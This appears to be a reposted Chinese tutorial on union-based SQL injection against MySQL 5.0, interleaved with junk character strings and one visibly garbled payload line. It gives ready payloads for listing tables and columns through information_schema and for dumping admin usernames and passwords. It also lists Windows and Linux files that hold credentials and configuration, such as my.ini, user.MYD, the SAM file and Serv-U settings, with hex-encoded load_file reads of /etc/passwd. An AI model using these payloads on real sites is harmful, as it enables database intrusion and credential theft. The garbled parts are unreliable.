mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
; D: t4 Y) n8 U: H8 @; \4 U
# e7 Q; R: }$ B3 ^$ O
* A' e* @$ ?9 [: G5 O
) N- u0 r1 ~, M# D3 }# WMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
' O8 O' r/ v  Y+ M; Y, }中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
3 C& M+ @. S( L" e2 e  |8 q|—字段：SCHEMA_NAME ->数据库名称

2 G" Z3 F3 {* T. u) q7 n9 D6 Q|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
/ P$ j+ s$ M, F3 J7 r4 K6 F|—字段：TABLE_SCHEMA ->该字段所属数据库名
7 z6 N3 G8 r. d5 E|—字段：TABLE_NAME ->存储所属表的名称

5 ]* Q1 ^5 O' n; N; T9 }|—字段：COLUMN_NAME ->该字段的名称

& F. I" m3 ~: X4 e#########################################################################
1 n* t3 [0 K) \9 ^##

0×001 获取系统信息:

union select 1,2,3,4,5,concat
7 _8 s% R6 u; }2 k(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
7 t/ g) y8 o& ?: _5 `(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

; h7 O2 l+ f8 d4 p/*
5 O  K$ l! p" o
@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
. E0 `+ Z9 A1 h& c- o% @
! R& F+ S4 y: ?*/

######################################################################
/ t- Q8 F. I3 Y9 B  P% x
0×002 获取表名
5 G3 I8 @7 L* ]: |
1 @) V$ M, c7 x* C, {union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
) e! q6 L' O* Z/ G* ?information_schema.tables where table_schema=0x67617264656e /*

/*
& Y9 e$ j0 h# t* E+ q
0x67617264656e 为当前数据库名
, r! E& t' m9 |5 N- i/ Y
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

  s6 C$ ?7 k+ \- N0 t*/

& F1 E/ O3 {9 u% f# L4 ^######################################################################

0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
5 l% o( _8 M% h2 `information_schema.columns where table_name=0x61646d696e and


table_schema=0x67617264656e limit 1 /*

5 s. Z! r7 ]5 Y7 L+ l" _/*

+ V/ v% {6 M( ~) d' bgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
: q9 u# o  B9 n: M# ?
0x61646d696e ->选择一个表

0x67617264656e ->数据库名

*/
1 i; A9 B9 T3 ?3 w9 U4 x7 k6 {) A' W1 A
/ p1 s! X: i6 f% ?, R; }#####################################################################
! w5 C4 j. {$ N) m
; t! B* H" E/ I. t' x9 s7 y0×004 获取数据
8 V: b7 Z) ?1 ]8 b2 l
union select 1,2,3
; u/ p; l# D7 r6 I; `2 M,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
  N7 ~  x. a& L; |: B$ u3 F
, R4 e3 r" @- `& W& |union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

) Q, }6 U# f+ S5 ^9 I; m/*

: p* ~" z( U  F& {+ d+ F0x3c62723e 换行符号HEX编码
$ x2 y5 h0 Z$ ~$ ~
$ T. Q% `2 C- E2 }7 j( B' t; |group_concat 同时获得该字段所有数据

1 g3 |9 E! S6 S# e$ P*/

5 ~" L; h: V2 B- k5 f! f
, R: r$ @/ i9 t; b- F" \
$ ~; F7 ^& L% Z6 r+ W& S, O. K

# @% E( n+ m/ D8 O. E4 b/ J顺便添加一些mysql注入时非常有用的一些东西
8 c4 e1 U: a% R- {( R2 j' Q
, y1 ~# a$ H, m. W简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
1 A7 w( H' C2 `4 ~; v
1:system_user() 系统用户名
4 E+ I3 ~3 T) V- N; v% E5 i2:user()        用户名
; o0 l+ c( T7 ^3:current_user()  当前用户名
4:session_user()连接数据库的用户名
. D2 i/ j: S$ N! I5:database()    数据库名
6:version()     MYSQL数据库版本
  t, l1 l. Y6 A2 Y/ `2 [7:load_file()   MYSQL读取本地文件的函数
4 J  l, x8 a, U% k5 F* ~/ s$ A8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
+ L8 }9 W3 O3 y/ J! V6 V1 kWINDOWS下:
  u* H, j/ c0 dc:/boot.ini          //查看系统版本
8 n5 d3 A7 j/ v" Z2 |8 y2 t% q+ e/ Bc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
. R  T  M' p4 M' b. U; @c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
# V2 x, s3 t* y/ |9 Z! f; y$ @& l! }c:\Program Files\Serv-U\ServUDaemon.ini
/ f2 ~0 m, E$ N: Y& d: hc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
6 f. n1 d' }& m* P6 O0 D9 }- P5 n$ jc:\Program Files\RhinoSoft.com\ServUDaemon.exe
9 H" {0 d2 z9 l3 o  `  d4 a* QC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.

3 z% V9 w2 Y5 A' m
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
2 \* }3 [9 d" z5 @C:\Program Files\mysql\my.ini
) W* `* ?- v" Q6 S; {- cc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
* k0 M( l% Q$ }+ F% T$ w+ t! \1 w8 }" BC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
) V& a& ]- N* P' y' {  H/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
3 I  a/ q. M7 a1 t) E/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
1 M2 P# M5 b- T; M9 a) H/etc/httpd/conf/httpd.conf // apache配置文件
/ q3 U. c% a6 k# |/ y8 F* ?0 l+ U6 P/etc/rsyncd.conf //同步程序配置文件
* u* @( j, a+ Y" ?& b& {/etc/my.cnf //mysql的配置文件
3 W) y; G4 h5 ]' m9 D9 v8 _/etc/redhat-release //系统版本
9 @9 e. ^: @* z# b7 `! b5 }/etc/issue
) f4 @6 x/ v0 I( X& c+ J/etc/issue.net
9 l. `5 D" O9 q/usr/local/app/php5/lib/php.ini //PHP相关设置
# f$ x7 j( p: c% a6 u/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
6 |% C) S# A5 I; @$ \, }$ z9 d/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
' r9 h/ E! a$ ~, y& i: `/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
, h- J* c  i/ z# y" B4 v, i/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
! m5 Q1 m# L- _: W* ~+ ?4 @: D/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
' ^' a5 q! y& G: K0 f/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
0 P. g; |! X5 D/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
( F, F$ `- e6 d% W6 L: o/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
% X  ?6 f) \& l( i9 Z6 b" T5 P+ T* Yreplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
' H5 q2 A5 Z' U* Y上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
6 \, r+ b+ r$ N# Q  f3 X
0 {0 v. w+ ?7 r" n; X/ M" W0 O) _